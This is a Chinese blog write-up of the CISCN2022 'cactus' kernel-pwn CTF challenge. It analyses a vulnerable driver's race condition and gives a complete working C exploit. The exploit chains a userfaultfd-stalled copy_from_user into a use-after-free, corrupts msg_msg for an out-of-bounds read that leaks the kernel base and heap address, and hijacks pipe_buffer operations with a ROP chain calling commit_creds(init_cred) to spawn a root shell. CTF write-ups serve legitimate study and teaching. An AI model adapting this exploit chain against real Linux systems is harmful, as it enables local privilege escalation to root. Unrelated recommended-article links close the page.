【userfaultfd+msg_msg+pipe_buffer】CISCN2022-cactus

于 2023-10-10 10:16:32 发布
阅读量146 收藏 1
点赞数
分类专栏: # kernel-pwn 文章标签: kernel-pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133737329
版权

启动脚本:

#!/bin/sh
qemu-system-x86_64 \
    -m 128M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
    -cpu kvm64,+smep,+smap\
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
    -nographic \
    -no-reboot \
    -s

开启了 smep、smap、kaslr 和 kpti 保护。经过测试,没有开启 slab_freelist_random 保护。

如何测试有没有开启 slab_freelist_random 等保护呢?很简单,自己写个驱动去测试就行了 

 程序分析

虽然 kernel_release 再释放 buffer 后没有置空,但是 kernel_open 中设置了 flags 字段导致我们无法同时打开多次设备文件。所以这里不会产生漏洞,而 kernel_read 和 kernel_write 都是针对 buffer 指针的,所以不做分析。

这里只分析可以利用的功能:kernel_ioctl

该函数实现了一个 1024 大小的菜单堆,分别有两次 add、edit、dele 的机会,但是整个过程都没有上锁。

可以利用的点主要在于 edit 时使用了 copy_from_user,并且整个过程都没有上锁。

漏洞利用

通过查看内核版本,发现其为 version 5.10.102,所以这里我们是可以使用 userfaultfd 系统调用的。

 所以我们可以在 edit 时使用 userfaultfd 将其卡住,然后 dele 掉这个堆块,再将该堆块申请到其他结构体上,这时候我们就可以实现任意写的功能,但是这里只有两次机会。

msg_msg 泄漏内核基地址和堆地址

这里泄漏堆地址是为了后面利用 pipe_buffer 提权用的。

经过测试并没有开启 slab_freelist_random 保护,所以我们可以利用一次任意写去修改 msg_msg 的 m_ts 字段从而实现越界读,并且形成如下堆布局去泄漏内核基地址和堆地址:

所以通过越界读,我们可以读取 pipe_buffer 中的 anon_pipe_buf_ops 去泄漏内核基地址,通过 msg_msg_2 中的 prev 字段我们就可以泄漏 msg_msg_1 的堆地址。

pipe_buffer 提权

这时我们可以将 msg_msg_1 释放掉,所以下一次申请堆块时就会拿到该堆块,因此我们可以再利用一次任意写去劫持 pipe_buffer 进行提取。

exp如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>

#define PIPE_BUFFER_NUM 1
#define QID_NUM 1
#define GLOBAL_FUNC_TABLE 0xffffffff8203ed80
size_t pop_rdi = 0xffffffff8108c420; // pop rdi ; ret
size_t magic_gadget = 0xFFFFFFFF812C4CCE;
size_t swapgs_kpti = 0xFFFFFFFF81C00FCB;
size_t init_cred = 0xffffffff82a6b700;
size_t commit_creds = 0xffffffff810c9540;
size_t kernel_offset = 0;
size_t pipe_buffer_addr = 0;

int fd;
int qid;
int global_pipe_fd[2];
size_t uffd_buf[512];
pthread_t moniter_thr;
sem_t add_leak;
sem_t edit_leak;
sem_t add_hijack;
sem_t edit_hijack;
sem_t continue_sem;

struct args {
        size_t idx;
        size_t size;
        char* buf;
};

struct msg_buf {
        long m_type;
        char m_text[1];
};

struct msg_header {
        void* l_next;
        void* l_prev;
        size_t m_type;
        size_t m_ts;
        void* next;
        void* security;
};

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

void add(char* buf)
{
        struct args arg = { .size = buf };
        if (ioctl(fd, 0x20, &arg) < 0) err_exit("add object");
}

void dele(size_t idx)
{
        struct args arg = { .idx = idx };
        ioctl(fd, 0x30, &arg);
}

void edit(size_t idx, size_t size, char* buf)
{
        struct args arg = { .idx = idx, .size = size, .buf = buf };
        ioctl(fd, 0x50, &arg);
}


void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    char* args[] = { "/bin/sh", NULL };
    execve("/bin/sh", args, NULL);

//    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_rsp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

void register_userfaultfd(void* buf, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) err_exit("syscall __NR_userfaultfd");

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) err_exit("ioctl UFFDIO_API");

        uffdio_register.range.start = (unsigned long)buf;
        uffdio_register.range.len = 0x1000;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) err_exit("ioctl UFFDIO_REGISTER");

        if (pthread_create(&moniter_thr, NULL, handler, (void*)uffd)) err_exit("pthread_create userfaultfd");
}


void leak(void* args)
{
        long uffd;
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;

        uffd = (long)args;

        for (;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) == -1) err_exit("poll in leak thread");


                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) err_exit("EOF in leak userfaultfd");
                if (res == -1) err_exit("read in leak thread");
                if (msg.event != UFFD_EVENT_PAGEFAULT) err_exit("err event in leak thread");

                info("Leak in userfaultfd");
                sem_post(&add_leak);
                uffd_buf[0] = 0xdeadbeef;
                uffd_buf[1] = 0xbeefdead;
                uffd_buf[2] = 1;
                uffd_buf[3] = 0x1000-0x30;
                sem_wait(&edit_leak);

                uffdio_copy.src = (unsigned long)uffd_buf;
                uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(0x1000-1);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) err_exit("ioctl UFFDIO_COPY in leak thread");
                sem_post(&continue_sem);
        }
}

void uaf_to_leak(void* args)
{
        struct msg_buf* msg;
        char msg_buffer[0x400];
        memset(msg_buffer, 'A', sizeof(msg_buffer));
        msg = (struct msg_buf*)msg_buffer;
        msg->m_type = 1;
        sem_wait(&add_leak);
        info("uaf_to_msgmsg");
        dele(0);
        qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
        if (qid < 0) err_exit("msgget in uaf_to_msgmsg");
        if (msgsnd(qid, msg, 0x400-0x30, 0) < 0) err_exit("msgsnd int uaf_to_msgmsg");
        sem_post(&edit_leak);
}

void hijack(void* args)
{
        long uffd;
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;

        uffd = (long)args;

        for (;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) == -1) err_exit("poll in hijack thread");

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) err_exit("EOF in hijack userfaultfd");
                if (res == -1) err_exit("read in hijack thread");
                if (msg.event != UFFD_EVENT_PAGEFAULT) err_exit("err event in hijack thread");

                info("Hijack in userfaultfd");
                sem_post(&add_hijack);
                uffd_buf[0] = 0;
                uffd_buf[1] = 0;
                uffd_buf[2] = pipe_buffer_addr+0x20;
                uffd_buf[3] = 0;
                uffd_buf[4] = pop_rdi+kernel_offset;
                uffd_buf[5] = magic_gadget+kernel_offset;
                uffd_buf[6] = pop_rdi+kernel_offset;
                uffd_buf[7] = init_cred+kernel_offset;
                uffd_buf[8] = commit_creds+kernel_offset;
                uffd_buf[9] = swapgs_kpti+kernel_offset;
                uffd_buf[10] = 0;
                uffd_buf[11] = 0;
                uffd_buf[12] = get_root_shell;
                uffd_buf[13] = user_cs;
                uffd_buf[14] = user_rflags;
                uffd_buf[15] = user_rsp;
                uffd_buf[16] = user_ss;
                sem_wait(&edit_hijack);

                uffdio_copy.src = (unsigned long)uffd_buf;
                uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(0x1000-1);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) err_exit("ioctl UFFDIO_COPY in hijack thread");
                sem_post(&continue_sem);
        }
}

void uaf_to_hijack_pipe_buffer(void* args)
{
        int res;
        sem_wait(&add_hijack);
        dele(0);
        info("uaf_to_pipe_buffer");
        res = pipe(global_pipe_fd);
        if (res < 0) err_exit("create pipe");
        res = write(global_pipe_fd[1], "pwnpwner", 8);
        if (res < 0) err_exit("write pipe");
        sem_post(&edit_hijack);
}

int main(int argc, char** argv, char** env)
{
        bind_core(0);
        save_status();
        pthread_t leak_thr;
        pthread_t hijack_thr;
        char arg_buf[1024];
        size_t buf[1024];
//      size_t kernel_offset;
        int pipe_fd[PIPE_BUFFER_NUM][2];
        char *uffd_buf1;
        char *uffd_buf2;
        int res;
        int my_qid[QID_NUM];
        struct msg_buf* msg;
        struct msg_header* first_msg;
        struct msg_header* second_msg;
        char message[0x400];

        msg = (struct msg_buf*)message;
        fd = open("/dev/kernelpwn", O_RDWR);
        if (fd < 0) err_exit("open /dev/kernelpwn");

        uffd_buf1 = (char*)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1 , 0);
        uffd_buf2 = (char*)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1 , 0);
        register_userfaultfd(uffd_buf1, (void*)leak);
        register_userfaultfd(uffd_buf2, (void*)hijack);

        sem_init(&add_leak, 0, 0);
        sem_init(&edit_leak, 0, 0);
        sem_init(&add_hijack, 0, 0);
        sem_init(&edit_hijack, 0, 0);
        sem_init(&continue_sem, 0, 0);

        pthread_create(&leak_thr, NULL, uaf_to_leak, NULL);
        pthread_create(&hijack_thr, NULL, uaf_to_hijack_pipe_buffer, NULL);

        memset(arg_buf, 'A', sizeof(arg_buf));
        add(arg_buf);
        edit(0, 0x20, uffd_buf1);
        sem_wait(&continue_sem);

        for (int i = 0; i < PIPE_BUFFER_NUM; i++)
        {
                if (pipe(pipe_fd[i]) < 0) err_exit("create pipe");
                if (write(pipe_fd[i][1], "pwnpwner", 8) < 0) err_exit("write pipe");
        }

        for (int i = 0; i < QID_NUM; i++)
        {
                my_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
                if (my_qid[i] < 0) err_exit("msgget in uaf_to_msgmsg");
                msg->m_type = 1;
                *(int*)&msg->m_text[0] = 0xAAAAAAAA + 0x11111111*i;
                if (msgsnd(my_qid[i], msg, 0x400-0x30, 0) < 0) err_exit("msgsnd int uaf_to_msgmsg");
                msg->m_type = 2;
                *(int*)&msg->m_text[0] = 0xAAAAAAAA + 0x11111111*(i+1);
                if (msgsnd(my_qid[i], msg, 0x400-0x30, 0) < 0) err_exit("msgsnd int uaf_to_msgmsg");
        }

        res = msgrcv(qid, buf, 0x1000-0x30, 0, MSG_COPY|IPC_NOWAIT|MSG_NOERROR);
        if (res < 0) err_exit("msgrev");
        hexx("msgrcv msgmsg length", res);
        binary_dump("msg_msg data", (char*)buf+8+0x400-0x30, 0xc00);
        if (buf[123+2] < 0xffffffff81000000 || (buf[123+2]&0xfff) != 0xd80) err_exit("No OOB the pipe_buffer");
        kernel_offset = buf[123+2] - GLOBAL_FUNC_TABLE;
        hexx("kernel_offset", kernel_offset);

        first_msg = (struct msg_header*)((char*)buf+8+0x400-0x30+0x400);
        second_msg = (struct msg_header*)((char*)buf+8+0x400-0x30+0x800);
        pipe_buffer_addr = second_msg->l_prev;
        if (*(int*)((char*)first_msg+0x30) != 0xaaaaaaaa) err_exit("the nearby object is not first_msg");
        if (*(int*)((char*)second_msg+0x30) != 0xbbbbbbbb) err_exit("the nearby object is not second_msg");
        hexx("first_msg->l_next", first_msg->l_next);
        hexx("first_msg->l_prev", first_msg->l_prev);
        hexx("second_msg->l_next", second_msg->l_next);
        hexx("second_msg->l_prev", second_msg->l_prev);
        hexx("pipe_buffer_addr", pipe_buffer_addr);

        for (int i = 0; i < QID_NUM; i++)
        {
                res = msgrcv(my_qid[i], buf, 0x400-0x30, 2, 0);
                if (res < 0) err_exit("msgrev unlink");
                hexx("msgrcv msgmsg length", res);
                res = msgrcv(my_qid[i], buf, 0x400-0x30, 1, 0);
                if (res < 0) err_exit("msgrev unlink");
                hexx("msgrcv msgmsg length", res);
        }

        add(arg_buf);
        edit(0, 0x100, uffd_buf2);
        sem_wait(&continue_sem);

        if (close(global_pipe_fd[0]) < 0) err_exit("close pipe");
        if (close(global_pipe_fd[1]) < 0) err_exit("close pipe");

        return 0;
}

打包运行即可完成提取: 

XiaozaYa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HDU - 3594 Cactus (强连通缩点+STL)
Fushicho_XF的博客
07-19 456
题目链接 题意:T组测试样例,每组样例给出一个N,表示(编号为0~N-1)的点有向图,随后给出这个有向图的边,每行是一个u和v,当u==0且v==0时边的输入结束.当每组两个条件时,输出YES,否则输出NO.          条件一:该图是一个强连通图;          条件二:该图中每条边都只属于一个环,即不能被多个环遍历到; 题解:对于这个题目,我们首先需要使用强连通图的Tarja...
cactus2_shopping-cart
03-31
cactus2_shopping-cart
cactus java_Cactus入门
weixin_39841136的博客
02-13 131
这是一个WebProject,有关Cactus用法详见本文测试用例首先是web.xmlxmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://java.sun.com/xml/ns/javaeehttp://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"&...
cactus java_Cactus实例讲解(转载)
weixin_30909915的博客
02-15 168
Cactus简介. 简介Cactus实现了对JUnit测试框架的无缝扩展,可以方便地测试服务端应用程序。Cactus可以在下面几种情况下使用:测试Servlet以及任何使用了像HttpServletRequest,HttpServletResponse,……这样的对象的代码。使用ServletTestCase。测试Filter以及任何使用了像FilterConfig,……这样的对象的代码。使用Fi...
水果数据集(Fruit-Dataset )+水果分类识别训练代码(支持googlenet, resnet, inception_v3, mobilenet_v2)
热门推荐
AI吃大瓜的博客
08-27 4万+
水果数据集,水果分类识别,水果识别,本项目将采用深度学习的方法,搭建一个水果分类识别的训练和测试系统,实现一个简单的水果图像分类识别系统。目前,基于ResNet18的水果分类识别,支持262种水果分类识别,在水果数据集Fruit-Dataset上,训练集的Accuracy在94%左右,测试集的Accuracy在82%左右,骨干网络,可支持googlenet, resnet[18,34,50], inception_v3,mobilenet_v2...
CodeForces - 231E-Cactus(Tarjan缩点+LCA
xbb0720的博客
11-04 580
(一)题面: 题目链接:CodeForces - 231E - Cactus A connected undirected graph is called a vertex cactus, if each vertex of this graph belongs to at most one simple cycle. A simple cycle in a undirected graph...
Codeforces Round #143 (Div. 2)--E. Cactus--缩点+LCA
lanshan1111的博客
09-30 164
https://codeforces.com/problemset/problem/231/E E. Cactus time limit per test 2 seconds memory limit per test 256 megabytes input standard input output standard output A connected undirected...
【CF856D】Masha and Cactus-树形DP+LCA+树状数组
Maxwei_wzj的OI世界
12-01 452
测试地址:Masha and Cactus 题目大意: 给定一棵树,再给定mmm条边,每条边有权值,从里面选出一些边加入树中,使得形成的图是仙人掌,即每个点至多处在一个环中的图,并使得加入的边的权值和最大,求出这个最大值。 做法: 本题需要用到树形DP+LCA+树状数组。 首先转化一下问题。不难想到,添加一条边会使得树上的一条路径上的点被一个环覆盖,那么要使一个点至多在一个环中,也就是要求添加的边...
HttpClient详解--springboot+httpclient
IT二叔的博客
04-16 7999
Http简介 HTTP 协议可能是现在 Internet 上使用得最多、最重要的协议了,越来越多的 Java 应用程序需要直接通过 HTTP 协议来访问网络资源。虽然在 JDK 的 java net包中已经提供了访问 HTTP 协议的基本功能,但是对于大部分应用程序来说,JDK 库本身提供的功能还不够丰富和灵活。HttpClient 是 Apache Jakarta Common 下的子项目,用来提供高效的、最新的、功能丰富的支持 HTTP 协议的客户端编程工具包,并且它支持 HTTP 协议最新的版本和建议
jetty+cactus完成容器内测试
Red_Edward的专栏
06-06 652
首先无论如何都要先在项目的web.xml中添加如下
ant_cactus_demography
04-21
ant_partner_transitions_demography
Cactus_1920x1080_50.rar
06-15
Cactus_1920x1080_50.rar
使用EJB+Struts1.3+Ant+Cactus+DbUnit+JMeter+StrutsTest实现测试4
12-21
通过Ant Cactus DbUnit StrutsTest测试组件对一个简单应用程序进行全面的测试
使用EJB+Struts1.3+Ant+Cactus+DbUnit+JMeter+StrutsTest实现测试2
12-21
通过Ant Cactus DbUnit StrutsTest测试组件对一个简单应用程序进行全面的测试
100款古风PPT (24)(1).pptx
最新发布
06-24
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
-电容层析成像三维图像重建研究
06-24
-电容层析成像三维图像重建研究
基于matlab跨年烟花代码
06-24
**仿真咨询 1 各类智能优化算法改进及应用** 生产调度、经济调度、装配线调度、充电优化、车间调度、发车优化、水库调度、三维装箱、物流选址、货位优化、公交排班优化、充电桩布局优化、车间布局优化、集装箱船配载优化、水泵组合优化、解医疗资源分配优化、设施布局优化、可视域基站和无人机选址优化 **2 机器学习和深度学习方面** 卷积神经网络(CNN)、LSTM、支持向量机(SVM)、最小二乘支持向量机(LSSVM)、极限学习机(ELM)、核极限学习机(KELM)、BP、RBF、宽度学习、DBN、RF、RBF、DELM、XGBOOST、TCN实现风电预测、光伏预测、电池寿命预测、辐射源识别、交通流预测、负荷预测、股价预测、PM2.5浓度预测、电池健康状态预测、水体光学参数反演、NLOS信号识别、地铁停车精准预测、变压器故障诊断 **3 图像处理方面** 图像识别、图像分割、图像检测、图像隐藏、图像配准、图像拼接、图像融合、图像增强、图像压缩感知 **4 路径规划方面** 旅行商问题(TSP)、车辆路径问题(VRP、MVRP、CVRP、VRPTW等)、无人机三维路径规划、无人机协同、无人
STP4407-VB一款P-Channel沟道SOP8的MOSFET晶体管参数介绍与应用说明
06-24
SOP8;P—Channel沟道,-30V;-11A;RDS(ON)=10mΩ@VGS=10V,VGS=20V;Vth=-1.42V;
设计一个图书管理系统的注册web页面,使用junit+cactus进行自己编写的jsp用户注册程序进行单元自动化测试。
05-25
<%@ page import="org.apache.cactus.*" %> public class RegisterTest extends TestCase { public void testRegister() throws Exception { HttpServletRequest request = new MockHttpServletRequest(); ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值